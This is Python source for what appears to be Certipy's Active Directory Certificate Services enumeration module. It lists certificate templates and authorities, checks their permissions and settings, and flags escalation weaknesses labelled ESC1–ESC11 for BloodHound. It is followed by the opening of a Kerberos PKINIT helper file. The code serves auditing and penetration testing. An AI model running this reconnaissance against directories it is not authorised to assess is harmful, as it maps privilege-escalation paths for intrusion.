import argparse
import copy
import json
import os
import socket
import struct
import time
import zipfile
from collections import OrderedDict
from datetime import datetime
from typing import List

from asn1crypto import x509
from certipy.lib.constants import (
    CERTIFICATE_RIGHTS,
    CERTIFICATION_AUTHORITY_RIGHTS,
    EXTENDED_RIGHTS_MAP,
    EXTENDED_RIGHTS_NAME_MAP,
    MS_PKI_CERTIFICATE_NAME_FLAG,
    MS_PKI_ENROLLMENT_FLAG,
    MS_PKI_PRIVATE_KEY_FLAG,
    OID_TO_STR_MAP,
    WELLKNOWN_SIDS,
)
from certipy.lib.formatting import pretty_print
from certipy.lib.ldap import LDAPConnection, LDAPEntry
from certipy.lib.logger import logging
from certipy.lib.rpc import get_dce_rpc_from_string_binding
from certipy.lib.security import (
    ActiveDirectorySecurity,
    CertifcateSecurity,
    is_admin_sid,
)
from certipy.lib.target import Target
from impacket.dcerpc.v5 import rrp

from .ca import CA


def filetime_to_span(filetime: str) -> int:
    (span,) = struct.unpack("<q", filetime)

    span *= -0.0000001

    return int(span)


def span_to_str(span: int) -> str:
    if (span % 31536000 == 0) and (span // 31536000) >= 1:
        if (span / 31536000) == 1:
            return "1 year"
        return "%i years" % (span // 31536000)
    elif (span % 2592000 == 0) and (span // 2592000) >= 1:
        if (span // 2592000) == 1:
            return "1 month"
        else:
            return "%i months" % (span // 2592000)
    elif (span % 604800 == 0) and (span // 604800) >= 1:
        if (span / 604800) == 1:
            return "1 week"
        else:
            return "%i weeks" % (span // 604800)

    elif (span % 86400 == 0) and (span // 86400) >= 1:
        if (span // 86400) == 1:
            return "1 day"
        else:
            return "%i days" % (span // 86400)
    elif (span % 3600 == 0) and (span / 3600) >= 1:
        if (span // 3600) == 1:
            return "1 hour"
        else:
            return "%i hours" % (span // 3600)
    else:
        return ""


def filetime_to_str(filetime: str) -> str:
    return span_to_str(filetime_to_span(filetime))


class Find:
    def __init__(
        self,
        target: Target,
        json: bool = False,
        bloodhound: bool = False,
        old_bloodhound: bool = False,
        text: bool = False,
        stdout: bool = False,
        output: str = None,
        enabled: bool = False,
        vulnerable: bool = False,
        hide_admins: bool = False,
        dc_only: bool = False,
        scheme: str = "ldaps",
        connection: LDAPConnection = None,
        debug=False,
        **kwargs
    ):
        self.target = target
        self.json = json
        self.bloodhound = bloodhound or old_bloodhound
        self.old_bloodhound = old_bloodhound
        self.text = text or stdout
        self.stdout = stdout
        self.output = output
        self.enabled = enabled
        self.vuln = vulnerable
        self.hide_admins = hide_admins
        self.dc_only = dc_only
        self.scheme = scheme
        self.verbose = debug
        self.kwargs = kwargs

        self._connection = connection

    @property
    def connection(self) -> LDAPConnection:
        if self._connection is not None:
            return self._connection

        self._connection = LDAPConnection(self.target, self.scheme)
        self._connection.connect()

        return self._connection

    def open_remote_registry(self, target_ip: str, dns_host_name: str):

        dce = get_dce_rpc_from_string_binding(
            "ncacn_np:445[\\pipe\\winreg]",
            self.target,
            timeout=self.target.timeout,
            target_ip=target_ip,
            remote_name=dns_host_name,
        )

        for _ in range(3):
            try:
                dce.connect()
                dce.bind(rrp.MSRPC_UUID_RRP)
                logging.debug(
                    "Connected to remote registry at %s (%s)"
                    % (repr(self.target.remote_name), self.target.target_ip)
                )
                break
            except Exception as e:
                if "STATUS_PIPE_NOT_AVAILABLE" in str(e):
                    logging.warning(
                        (
                            "Failed to connect to remote registry. Service should be "
                            "starting now. Trying again..."
                        )
                    )
                    time.sleep(1)
                else:
                    raise e
        else:
            logging.warning("Failed to connect to remote registry")
            return None

        return dce

    def find(self):
        connection = self.connection

        if self.vuln:
            sids = connection.get_user_sids(self.target.username)

            if self.verbose:
                logging.debug("List of current user's SIDs:")
                for sid in sids:
                    print(
                        "     %s (%s)"
                        % (
                            self.connection.lookup_sid(sid).get("name"),
                            self.connection.lookup_sid(sid).get("objectSid"),
                        )
                    )
        else:
            sids = []

        logging.info("Finding certificate templates")

        templates = self.get_certificate_templates()

        logging.info(
            "Found %d certificate template%s"
            % (
                len(templates),
                "s" if len(templates) != 1 else "",
            )
        )

        logging.info("Finding certificate authorities")

        cas = self.get_certificate_authorities()

        logging.info(
            "Found %d certificate authorit%s"
            % (
                len(cas),
                "ies" if len(cas) != 1 else "y",
            )
        )

        no_enabled_templates = 0
        for ca in cas:
            object_id = ca.get("objectGUID").lstrip("{").rstrip("}")
            ca.set("object_id", object_id)

            ca_templates = ca.get("certificateTemplates")
            if ca_templates is None:
                ca_templates = []

            for template in templates:
                if template.get("name") in ca_templates:
                    no_enabled_templates += 1
                    if "cas" in template["attributes"].keys():
                        template.get("cas").append(ca.get("name"))
                        template.get("cas_ids").append(object_id)
                    else:
                        template.set("cas", [ca.get("name")])
                        template.set("cas_ids", [object_id])

        logging.info(
            "Found %d enabled certificate template%s"
            % (
                no_enabled_templates,
                "s" if no_enabled_templates != 1 else "",
            )
        )

        for ca in cas:

            if self.dc_only:
                user_specified_san, request_disposition, enforce_encrypt_icertrequest, security, web_enrollment = (
                    "Unknown",
                    "Unknown",
                    "Unknown",
                    None,
                    "Unknown",
                )
            else:
                user_specified_san, request_disposition, enforce_encrypt_icertrequest, security = (
                    "Unknown",
                    "Unknown",
                    "Unknown",
                    None,
                )
                try:
                    ca_name = ca.get("name")
                    ca_remote_name = ca.get("dNSHostName")
                    ca_target_ip = self.target.resolver.resolve(ca_remote_name)

                    ca_target = copy.copy(self.target)
                    ca_target.remote_name = ca_remote_name
                    ca_target.target_ip = ca_target_ip

                    ca_service = CA(ca_target, ca=ca_name)
                    edit_flags, request_disposition, interface_flags, security = ca_service.get_config()

                    if request_disposition:
                        request_disposition = (
                            "Pending" if request_disposition & 0x100 else "Issue"
                        )
                    else:
                        request_disposition = "Unknown"

                    if edit_flags:
                        user_specified_san = (edit_flags & 0x00040000) == 0x00040000
                        user_specified_san = (
                            "Enabled" if user_specified_san else "Disabled"
                        )
                    else:
                        user_specified_san = "Unknown"

                    if interface_flags:
                        enforce_encrypt_icertrequest = (interface_flags & 0x00000200) == 0x00000200
                        enforce_encrypt_icertrequest = (
                            "Enabled" if enforce_encrypt_icertrequest else "Disabled"
                        )
                    else:
                        enforce_encrypt_icertrequest = "Unknown"

                except Exception as e:
                    logging.warning(
                        "Failed to get CA security and configuration for %s: %s"
                        % (repr(ca.get("name")), e)
                    )

                try:
                    web_enrollment = self.check_web_enrollment(ca)
                    web_enrollment = "Enabled" if web_enrollment else "Disabled"
                except Exception as e:
                    logging.warning(
                        "Failed to check Web Enrollment for CA %s: %s"
                        % (repr(ca.get("name")), e)
                    )
                    web_enrollment = "Unknown"

            ca.set("user_specified_san", user_specified_san)
            ca.set("request_disposition", request_disposition)
            ca.set("enforce_encrypt_icertrequest", enforce_encrypt_icertrequest)
            ca.set("security", security)
            ca.set("web_enrollment", web_enrollment)

            subject_name = ca.get("cACertificateDN")

            ca_cert = x509.Certificate.load(ca.get("cACertificate")[0])[
                "tbs_certificate"
            ]

            serial_number = hex(int(ca_cert["serial_number"]))[2:].upper()

            validity = ca_cert["validity"].native
            validity_start = str(validity["not_before"])
            validity_end = str(validity["not_after"])

            ca.set("subject_name", subject_name)
            ca.set("serial_number", serial_number)
            ca.set("validity_start", validity_start)
            ca.set("validity_end", validity_end)

        for template in templates:
            template_cas = template.get("cas")
            enabled = template_cas is not None and len(template_cas) > 0
            template.set("enabled", enabled)

            object_id = template.get("objectGUID").lstrip("{").rstrip("}")
            template.set("object_id", object_id)

            validity_period = filetime_to_str(template.get("pKIExpirationPeriod"))
            template.set("validity_period", validity_period)

            renewal_period = filetime_to_str(template.get("pKIOverlapPeriod"))
            template.set("renewal_period", renewal_period)

            certificate_name_flag = template.get("msPKI-Certificate-Name-Flag")
            if certificate_name_flag is not None:
                certificate_name_flag = MS_PKI_CERTIFICATE_NAME_FLAG(
                    int(certificate_name_flag)
                )
            else:
                certificate_name_flag = MS_PKI_CERTIFICATE_NAME_FLAG(0)
            template.set("certificate_name_flag", certificate_name_flag.to_str_list())

            enrollment_flag = template.get("msPKI-Enrollment-Flag")
            if enrollment_flag is not None:
                enrollment_flag = MS_PKI_ENROLLMENT_FLAG(int(enrollment_flag))
            else:
                enrollment_flag = MS_PKI_ENROLLMENT_FLAG(0)
            template.set("enrollment_flag", enrollment_flag.to_str_list())

            private_key_flag = template.get("msPKI-Private-Key-Flag")
            if private_key_flag is not None:
                private_key_flag = MS_PKI_PRIVATE_KEY_FLAG(int(private_key_flag))
            else:
                private_key_flag = MS_PKI_PRIVATE_KEY_FLAG(0)
            template.set("private_key_flag", private_key_flag.to_str_list())

            authorized_signatures_required = template.get("msPKI-RA-Signature")
            if authorized_signatures_required is not None:
                authorized_signatures_required = int(authorized_signatures_required)
            else:
                authorized_signatures_required = 0
            template.set(
                "authorized_signatures_required", authorized_signatures_required
            )

            application_policies = template.get_raw("msPKI-RA-Application-Policies")
            if not isinstance(application_policies, list):
                if application_policies is None:
                    application_policies = []
                else:
                    application_policies = [application_policies]

            application_policies = list(map(lambda x: x.decode(), application_policies))

            application_policies = list(
                map(
                    lambda x: OID_TO_STR_MAP[x] if x in OID_TO_STR_MAP else x,
                    application_policies,
                )
            )
            template.set("application_policies", application_policies)

            eku = template.get_raw("pKIExtendedKeyUsage")
            if not isinstance(eku, list):
                if eku is None:
                    eku = []
                else:
                    eku = [eku]

            eku = list(map(lambda x: x.decode(), eku))

            extended_key_usage = list(
                map(lambda x: OID_TO_STR_MAP[x] if x in OID_TO_STR_MAP else x, eku)
            )
            template.set("extended_key_usage", extended_key_usage)

            any_purpose = (
                "Any Purpose" in extended_key_usage or len(extended_key_usage) == 0
            )
            template.set("any_purpose", any_purpose)

            client_authentication = any_purpose or any(
                eku in extended_key_usage
                for eku in [
                    "Client Authentication",
                    "Smart Card Logon",
                    "PKINIT Client Authentication",
                ]
            )
            template.set("client_authentication", client_authentication)

            enrollment_agent = any_purpose or any(
                eku in extended_key_usage
                for eku in [
                    "Certificate Request Agent",
                ]
            )
            template.set("enrollment_agent", enrollment_agent)

            enrollee_supplies_subject = any(
                flag in certificate_name_flag
                for flag in [
                    MS_PKI_CERTIFICATE_NAME_FLAG.ENROLLEE_SUPPLIES_SUBJECT,
                ]
            )
            template.set("enrollee_supplies_subject", enrollee_supplies_subject)

            requires_manager_approval = (
                MS_PKI_ENROLLMENT_FLAG.PEND_ALL_REQUESTS in enrollment_flag
            )
            template.set("requires_manager_approval", requires_manager_approval)

            no_security_extension = (
                MS_PKI_ENROLLMENT_FLAG.NO_SECURITY_EXTENSION in enrollment_flag
            )
            template.set("no_security_extension", no_security_extension)

            requires_key_archival = (
                MS_PKI_PRIVATE_KEY_FLAG.REQUIRE_PRIVATE_KEY_ARCHIVAL in private_key_flag
            )
            template.set("requires_key_archival", requires_key_archival)

        prefix = (
            datetime.now().strftime("%Y%m%d%H%M%S") if not self.output else self.output
        )

        not_specified = not any([self.json, self.bloodhound, self.text])

        if self.bloodhound or not_specified:
            self.output_bloodhound_data(prefix, templates, cas)

        if self.text or self.json or not_specified:
            output = self.get_output_for_text_and_json(templates, cas)

            if self.text or not_specified:
                if self.stdout:
                    logging.info("Enumeration output:")
                    pretty_print(output)
                else:
                    with open("%s_Certipy.txt" % prefix, "w") as f:
                        pretty_print(output, print=lambda x: f.write(x) + f.write("\n"))
                    logging.info(
                        "Saved text output to %s" % repr("%s_Certipy.txt" % prefix)
                    )

            if self.json or not_specified:
                with open("%s_Certipy.json" % prefix, "w") as f:
                    json.dump(output, f, indent=2)

                logging.info(
                    "Saved JSON output to %s" % repr("%s_Certipy.json" % prefix)
                )

    def get_output_for_text_and_json(
        self, templates: List[LDAPEntry], cas: List[LDAPEntry]
    ):
        ca_entries = {}
        template_entries = {}

        for template in templates:
            if self.enabled and template.get("enabled") is not True:
                continue

            vulnerabilities = self.get_template_vulnerabilities(template)
            if self.vuln and len(vulnerabilities) == 0:
                continue

            entry = OrderedDict()
            entry = self.get_template_properties(template, entry)

            permissions = self.get_template_permissions(template)
            if len(permissions) > 0:
                entry["Permissions"] = permissions

            if len(vulnerabilities) > 0:
                entry["[!] Vulnerabilities"] = vulnerabilities

            template_entries[len(template_entries)] = entry

        for ca in cas:
            entry = OrderedDict()
            entry = self.get_ca_properties(ca, entry)

            permissions = self.get_ca_permissions(ca)
            if len(permissions) > 0:
                entry["Permissions"] = permissions

            vulnerabilities = self.get_ca_vulnerabilities(ca)
            if len(vulnerabilities) > 0:
                entry["[!] Vulnerabilities"] = vulnerabilities

            ca_entries[len(ca_entries)] = entry

        output = {}

        if len(ca_entries) == 0:
            output["Certificate Authorities"] = "[!] Could not find any CAs"
        else:
            output["Certificate Authorities"] = ca_entries

        if len(template_entries) == 0:
            output[
                "Certificate Templates"
            ] = "[!] Could not find any certificate templates"
        else:
            output["Certificate Templates"] = template_entries

        return output

    def output_bloodhound_data(
        self, prefix: str, templates: List[LDAPEntry], cas: List[LDAPEntry]
    ):
        template_entries = []
        ca_entries = []

        for template in templates:
            template_properties = OrderedDict()
            template_properties["name"] = "%s@%s" % (
                template.get("cn").upper(),
                self.connection.domain.upper(),
            )
            template_properties["highvalue"] = template.get("enabled") and any(
                [
                    all(
                        [
                            template.get("enrollee_supplies_subject"),
                            not template.get("requires_manager_approval"),
                            template.get("client_authentication"),
                        ]
                    ),
                    all(
                        [
                            template.get("enrollment_agent"),
                            not template.get("requires_manager_approval"),
                        ]
                    ),
                ]
            )

            template_properties = self.get_template_properties(
                template, template_properties
            )

            template_properties["domain"] = self.connection.domain.upper()

            if self.old_bloodhound:
                template_properties["type"] = "Certificate Template"

            security = CertifcateSecurity(template.get("nTSecurityDescriptor"))
            if security is None:
                aces = []
            else:
                aces = self.security_to_bloodhound_aces(security)

            entry = {
                "Properties": template_properties,
                "ObjectIdentifier": template.get("object_id"),
                "Aces": aces,
            }

            if not self.old_bloodhound:
                entry["cas_ids"] = template.get("cas_ids")

            template_entries.append(entry)

        for ca in cas:
            ca_properties = OrderedDict()
            ca_properties["name"] = "%s@%s" % (
                ca.get("name").upper(),
                self.connection.domain.upper(),
            )
            ca_properties[
                "highvalue"
            ] = False  # It is a high value, but the 'Enroll' will give many false positives

            ca_properties = self.get_ca_properties(ca, ca_properties)

            ca_properties["domain"] = self.connection.domain.upper()

            if self.old_bloodhound:
                ca_properties["type"] = "Enrollment Service"

            security = ca.get("security")
            if security is None:
                aces = []
            else:
                aces = self.security_to_bloodhound_aces(security)

            entry = {
                "Properties": ca_properties,
                "ObjectIdentifier": ca.get("object_id"),
                "Aces": aces,
            }

            ca_entries.append(entry)

        zipf = zipfile.ZipFile("%s_Certipy.zip" % prefix, "w")

        if self.old_bloodhound:
            gpos_filename = "%s_gpos.json" % prefix
            entries = ca_entries + template_entries
            with open(gpos_filename, "w") as f:
                json.dump(
                    {
                        "data": entries,
                        "meta": {
                            "count": len(entries),
                            "type": "gpos",
                            "version": 4,
                        },
                    },
                    f,
                )
            zipf.write(gpos_filename, gpos_filename)
            os.unlink(gpos_filename)
        else:
            cas_filename = "%s_cas.json" % prefix
            with open(cas_filename, "w") as f:
                json.dump(
                    {
                        "data": ca_entries,
                        "meta": {
                            "count": len(ca_entries),
                            "type": "cas",
                            "version": 4,
                        },
                    },
                    f,
                )
            zipf.write(cas_filename, cas_filename)
            os.unlink(cas_filename)

            templates_filename = "%s_templates.json" % prefix
            with open(templates_filename, "w") as f:
                json.dump(
                    {
                        "data": template_entries,
                        "meta": {
                            "count": len(template_entries),
                            "type": "templates",
                            "version": 4,
                        },
                    },
                    f,
                )
            zipf.write(templates_filename, templates_filename)
            os.unlink(templates_filename)

        zipf.close()
        logging.info(
            (
                "Saved BloodHound data to %s. Drag and drop the file into the "
                "BloodHound GUI from %s"
            )
            % (
                repr(
                    "%s_Certipy.zip" % prefix,
                ),
                "@BloodHoundAD" if self.old_bloodhound else "@ly4k",
            )
        )

    def check_web_enrollment(self, ca: LDAPEntry) -> bool:
        target_name = ca.get("dNSHostName")

        target_ip = self.target.resolver.resolve(target_name)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.target.timeout)

            logging.debug("Connecting to %s:80" % target_ip)
            sock.connect((target_ip, 80))
            sock.sendall(
                "\r\n".join(
                    ["HEAD /certsrv/ HTTP/1.1", "Host: %s" % target_name, "\r\n"]
                ).encode()
            )
            resp = sock.recv(256)
            sock.close()
            head = resp.split(b"\r\n")[0].decode()

            return " 404 " not in head
        except ConnectionRefusedError:
            return False
        except socket.timeout:
            return False
        except Exception as e:
            logging.warning(
                "Got error while trying to check for web enrollment: %s" % e
            )

        return False

    def get_certificate_templates(self) -> List[LDAPEntry]:
        templates = self.connection.search(
            "(objectclass=pkicertificatetemplate)",
            search_base="CN=Certificate Templates,CN=Public Key Services,CN=Services,%s"
            % self.connection.configuration_path,
            attributes=[
                "cn",
                "name",
                "displayName",
                "pKIExpirationPeriod",
                "pKIOverlapPeriod",
                "msPKI-Enrollment-Flag",
                "msPKI-Private-Key-Flag",
                "msPKI-Certificate-Name-Flag",
                "msPKI-Minimal-Key-Size",
                "msPKI-RA-Signature",
                "pKIExtendedKeyUsage",
                "nTSecurityDescriptor",
                "objectGUID",
            ],
            query_sd=True,
        )

        return templates

    def get_certificate_authorities(self) -> List[LDAPEntry]:
        cas = self.connection.search(
            "(&(objectClass=pKIEnrollmentService))",
            search_base="CN=Enrollment Services,CN=Public Key Services,CN=Services,%s"
            % self.connection.configuration_path,
            attributes=[
                "cn",
                "name",
                "dNSHostName",
                "cACertificateDN",
                "cACertificate",
                "certificateTemplates",
                "objectGUID",
            ],
        )

        return cas

    def security_to_bloodhound_aces(self, security: ActiveDirectorySecurity) -> List:
        aces = []

        owner = self.connection.lookup_sid(security.owner)

        aces.append(
            {
                "PrincipalSID": owner.get("objectSid"),
                "PrincipalType": owner.get("objectType"),
                "RightName": "Owns",
                "IsInherited": False,
            }
        )

        for sid, rights in security.aces.items():
            is_inherited = rights["inherited"]
            principal = self.connection.lookup_sid(sid)

            try:
                standard_rights = list(rights["rights"])
            except:
                standard_rights = rights["rights"].to_list()

            for right in standard_rights:
                aces.append(
                    {
                        "PrincipalSID": principal.get("objectSid"),
                        "PrincipalType": principal.get("objectType"),
                        "RightName": str(right),
                        "IsInherited": is_inherited,
                    }
                )

            extended_rights = rights["extended_rights"]

            for extended_right in extended_rights:
                aces.append(
                    {
                        "PrincipalSID": principal.get("objectSid"),
                        "PrincipalType": principal.get("objectType"),
                        "RightName": EXTENDED_RIGHTS_MAP[extended_right].replace(
                            "-", ""
                        )
                        if extended_right in EXTENDED_RIGHTS_MAP
                        else extended_right,
                        "IsInherited": is_inherited,
                    }
                )

        return aces

    def get_template_properties(
        self, template: LDAPEntry, template_properties: dict = None
    ) -> dict:
        properties_map = {
            "cn": "Template Name",
            "displayName": "Display Name",
            "cas": "Certificate Authorities",
            "enabled": "Enabled",
            "client_authentication": "Client Authentication",
            "enrollment_agent": "Enrollment Agent",
            "any_purpose": "Any Purpose",
            "enrollee_supplies_subject": "Enrollee Supplies Subject",
            "certificate_name_flag": "Certificate Name Flag",
            "enrollment_flag": "Enrollment Flag",
            "private_key_flag": "Private Key Flag",
            "extended_key_usage": "Extended Key Usage",
            "requires_manager_approval": "Requires Manager Approval",
            "requires_key_archival": "Requires Key Archival",
            "application_policies": "Application Policies",
            "authorized_signatures_required": "Authorized Signatures Required",
            "validity_period": "Validity Period",
            "renewal_period": "Renewal Period",
            "msPKI-Minimal-Key-Size": "Minimum RSA Key Length"
        }

        if template_properties is None:
            template_properties = OrderedDict()

        for property_key, property_display in properties_map.items():
            property_value = template.get(property_key)
            if property_value is None:
                continue
            template_properties[property_display] = property_value

        return template_properties

    def get_template_permissions(self, template: LDAPEntry):
        security = CertifcateSecurity(template.get("nTSecurityDescriptor"))
        permissions = {}
        enrollment_permissions = {}
        enrollment_rights = []
        all_extended_rights = []

        for sid, rights in security.aces.items():
            if self.hide_admins and is_admin_sid(sid):
                continue

            if (
                EXTENDED_RIGHTS_NAME_MAP["Enroll"] in rights["extended_rights"]
            ):
                enrollment_rights.append(self.connection.lookup_sid(sid).get("name"))
            if (
                EXTENDED_RIGHTS_NAME_MAP["All-Extended-Rights"]
                in rights["extended_rights"]
            ):
                all_extended_rights.append(self.connection.lookup_sid(sid).get("name"))

        if len(enrollment_rights) > 0:
            enrollment_permissions["Enrollment Rights"] = enrollment_rights

        if len(all_extended_rights) > 0:
            enrollment_permissions["All Extended Rights"] = all_extended_rights

        if len(enrollment_permissions) > 0:
            permissions["Enrollment Permissions"] = enrollment_permissions

        object_control_permissions = {}
        if not self.hide_admins or not is_admin_sid(security.owner):
            object_control_permissions["Owner"] = self.connection.lookup_sid(
                security.owner
            ).get("name")

        rights_mapping = [
            (CERTIFICATE_RIGHTS.GENERIC_ALL, [], "Full Control Principals"),
            (CERTIFICATE_RIGHTS.WRITE_OWNER, [], "Write Owner Principals"),
            (CERTIFICATE_RIGHTS.WRITE_DACL, [], "Write Dacl Principals"),
            (
                CERTIFICATE_RIGHTS.WRITE_PROPERTY,
                [],
                "Write Property Principals",
            ),
        ]
        for sid, rights in security.aces.items():
            if self.hide_admins and is_admin_sid(sid):
                continue

            rights = rights["rights"]
            sid = self.connection.lookup_sid(sid).get("name")

            for (right, principal_list, _) in rights_mapping:
                if right in rights:
                    principal_list.append(sid)

        for _, rights, name in rights_mapping:
            if len(rights) > 0:
                object_control_permissions[name] = rights

        if len(object_control_permissions) > 0:
            permissions["Object Control Permissions"] = object_control_permissions

        return permissions

    def get_template_vulnerabilities(self, template: LDAPEntry):
        def list_sids(sids: List[str]):
            sids_mapping = list(
                map(
                    lambda sid: repr(self.connection.lookup_sid(sid).get("name")),
                    sids,
                )
            )
            if len(sids_mapping) == 1:
                return sids_mapping[0]

            return ", ".join(sids_mapping[:-1]) + " and " + sids_mapping[-1]

        if template.get("vulnerabilities"):
            return template.get("vulnerabilities")

        vulnerabilities = {}

        user_can_enroll, enrollable_sids = self.can_user_enroll_in_template(template)

        if (
            not template.get("requires_manager_approval")
            and not template.get("authorized_signatures_required") > 0
        ):
            # ESC1
            if (
                user_can_enroll
                and template.get("enrollee_supplies_subject")
                and template.get("client_authentication")
            ):
                vulnerabilities["ESC1"] = (
                    "%s can enroll, enrollee supplies subject and template allows client authentication"
                    % list_sids(enrollable_sids)
                )

            # ESC2
            if user_can_enroll and template.get("any_purpose"):
                vulnerabilities["ESC2"] = (
                    "%s can enroll and template can be used for any purpose"
                    % list_sids(enrollable_sids)
                )

            # ESC3
            if user_can_enroll and template.get("enrollment_agent"):
                vulnerabilities["ESC3"] = (
                    "%s can enroll and template has Certificate Request Agent EKU set"
                    % list_sids(enrollable_sids)
                )

            # ESC9
            if user_can_enroll and template.get("no_security_extension"):
                vulnerabilities[
                    "ESC9"
                ] = "%s can enroll and template has no security extension" % list_sids(
                    enrollable_sids
                )

        # ESC4
        security = CertifcateSecurity(template.get("nTSecurityDescriptor"))
        owner_sid = security.owner

        if owner_sid in self.connection.get_user_sids(self.target.username):
            vulnerabilities[
                "ESC4"
            ] = "Template is owned by %s" % self.connection.lookup_sid(owner_sid).get(
                "name"
            )
        else:
            # No reason to show if user is already owner
            has_vulnerable_acl, vulnerable_acl_sids = self.template_has_vulnerable_acl(
                template
            )
            if has_vulnerable_acl:
                vulnerabilities["ESC4"] = "%s has dangerous permissions" % list_sids(
                    vulnerable_acl_sids
                )

        return vulnerabilities

    def template_has_vulnerable_acl(self, template: LDAPEntry):
        has_vulnerable_acl = False

        security = CertifcateSecurity(template.get("nTSecurityDescriptor"))
        aces = security.aces
        vulnerable_acl_sids = []
        for sid, rights in aces.items():
            if sid not in self.connection.get_user_sids(self.target.username):
                continue

            ad_rights = rights["rights"]
            if any(
                right in ad_rights
                for right in [
                    CERTIFICATE_RIGHTS.GENERIC_ALL,
                    CERTIFICATE_RIGHTS.WRITE_OWNER,
                    CERTIFICATE_RIGHTS.WRITE_DACL,
                    CERTIFICATE_RIGHTS.WRITE_PROPERTY,
                ]
            ):
                vulnerable_acl_sids.append(sid)
                has_vulnerable_acl = True

        return has_vulnerable_acl, vulnerable_acl_sids

    def can_user_enroll_in_template(self, template: LDAPEntry):
        user_can_enroll = False

        security = CertifcateSecurity(template.get("nTSecurityDescriptor"))
        aces = security.aces
        enrollable_sids = []
        for sid, rights in aces.items():
            if sid not in self.connection.get_user_sids(self.target.username):
                continue

            if (
                EXTENDED_RIGHTS_NAME_MAP["All-Extended-Rights"]
                in rights["extended_rights"]
                or EXTENDED_RIGHTS_NAME_MAP["Enroll"] in rights["extended_rights"]
                or CERTIFICATE_RIGHTS.GENERIC_ALL in rights["rights"]
            ):
                enrollable_sids.append(sid)
                user_can_enroll = True

        return user_can_enroll, enrollable_sids

    def get_ca_properties(self, ca: LDAPEntry, ca_properties: dict = None) -> dict:
        properties_map = {
            "name": "CA Name",
            "dNSHostName": "DNS Name",
            "cACertificateDN": "Certificate Subject",
            "serial_number": "Certificate Serial Number",
            "validity_start": "Certificate Validity Start",
            "validity_end": "Certificate Validity End",
            "web_enrollment": "Web Enrollment",
            "user_specified_san": "User Specified SAN",
            "request_disposition": "Request Disposition",
            "enforce_encrypt_icertrequest": "Enforce Encryption for Requests",
        }

        if ca_properties is None:
            ca_properties = OrderedDict()

        for property_key, property_display in properties_map.items():
            property_value = ca.get(property_key)
            if property_value is None:
                continue
            ca_properties[property_display] = property_value

        return ca_properties

    def get_ca_permissions(self, ca: LDAPEntry):
        security = ca.get("security")

        ca_permissions = {}
        access_rights = {}
        if security is not None:
            if not self.hide_admins or not is_admin_sid(security.owner):
                ca_permissions["Owner"] = self.connection.lookup_sid(
                    security.owner
                ).get("name")

            for sid, rights in security.aces.items():
                if self.hide_admins and is_admin_sid(sid):
                    continue
                try:
                    ca_rights = list(rights["rights"])
                except:
                    ca_rights = rights["rights"].to_list()
                for ca_right in ca_rights:
                    if ca_right not in access_rights:
                        access_rights[ca_right] = [
                            self.connection.lookup_sid(sid).get("name")
                        ]
                    else:
                        access_rights[ca_right].append(
                            self.connection.lookup_sid(sid).get("name")
                        )

            ca_permissions["Access Rights"] = access_rights

        return ca_permissions

    def get_ca_vulnerabilities(self, ca: LDAPEntry):
        def list_sids(sids: List[str]):
            sids_mapping = list(
                map(
                    lambda sid: repr(self.connection.lookup_sid(sid).get("name")),
                    sids,
                )
            )
            if len(sids_mapping) == 1:
                return sids_mapping[0]

            return ", ".join(sids_mapping[:-1]) + " and " + sids_mapping[-1]

        if ca.get("vulnerabilities"):
            return ca.get("vulnerabilities")

        vulnerabilities = {}

        # ESC6
        if (
            ca.get("user_specified_san") == "Enabled"
            and ca.get("request_disposition") == "Issue"
        ):
            vulnerabilities[
                "ESC6"
            ] = "Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022"

        # ESC7
        has_vulnerable_acl, vulnerable_acl_sids = self.ca_has_vulnerable_acl(ca)
        if has_vulnerable_acl:
            vulnerabilities["ESC7"] = "%s has dangerous permissions" % list_sids(
                vulnerable_acl_sids
            )

        # ESC8
        if ca.get("web_enrollment") == "Enabled" and ca.get("request_disposition") in [
            "Issue",
            "Unknown",
        ]:
            vulnerabilities["ESC8"] = (
                "Web Enrollment is enabled and Request Disposition is set to %s"
                % ca.get("request_disposition")
            )

        # ESC11
        if (
            ca.get("enforce_encrypt_icertrequest") == "Disabled"
            and ca.get("request_disposition") == "Issue"
        ):
            vulnerabilities[
                "ESC11"
            ] = "Encryption is not enforced for ICPR requests and Request Disposition is set to Issue"

        return vulnerabilities

    def ca_has_vulnerable_acl(self, ca: LDAPEntry):
        has_vulnerable_acl = False
        vulnerable_acl_sids = []

        security = ca.get("security")
        if security is None:
            return has_vulnerable_acl, vulnerable_acl_sids

        aces = security.aces
        for sid, rights in aces.items():
            if sid not in self.connection.get_user_sids(self.target.username):
                continue

            ad_rights = rights["rights"]
            if any(
                right in ad_rights
                for right in [
                    CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CA,
                    CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CERTIFICATES,
                ]
            ):
                vulnerable_acl_sids.append(sid)
                has_vulnerable_acl = True

        return has_vulnerable_acl, vulnerable_acl_sids


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options, dc_as_target=True)
    del options.target

    find = Find(target=target, **vars(options))
    find.find()



import datetime
import enum
import os
from random import getrandbits
from typing import Tuple, Union

from asn1crypto import algos as asn1algos
from asn1crypto import cms as asn1cms
from asn1crypto import core as asn1core
from asn1crypto import keys as asn1keys
from asn1crypto import x509 as asn1x509
from impacket.krb5 import constants

from certipy.lib.certificate import (
    cert_to_der,
    hash_digest,
    hashes,
    rsa,
    rsa_pkcs1v15_sign,
    x509,
)
from certipy.lib.structs import KDC_REQ_BODY, PrincipalName, KDCOptions, AS_REQ, PA_PAC_REQUEST

# https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py#L292
DH_PARAMS = {
    "p": int(
        (
            "00ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea6"
            "3b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e4"
            "85b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b"
            "1fe649286651ece65381ffffffffffffffff"
        ),
        16,
    ),
    "g": 2,
}

class NAME_TYPE(enum.Enum):
	UNKNOWN = 0     #(0),	-- Name type not known
	PRINCIPAL = 1     #(1),	-- Just the name of the principal as in
	SRV_INST = 2     #(2),	-- Service and other unique instance (krbtgt)
	SRV_HST = 3     #(3),	-- Service with host name as instance
	SRV_XHST = 4     # (4),	-- Service with host as remaining components
	UID = 5     # (5),		-- Unique ID
	X500_PRINCIPAL = 6     #(6), -- PKINIT
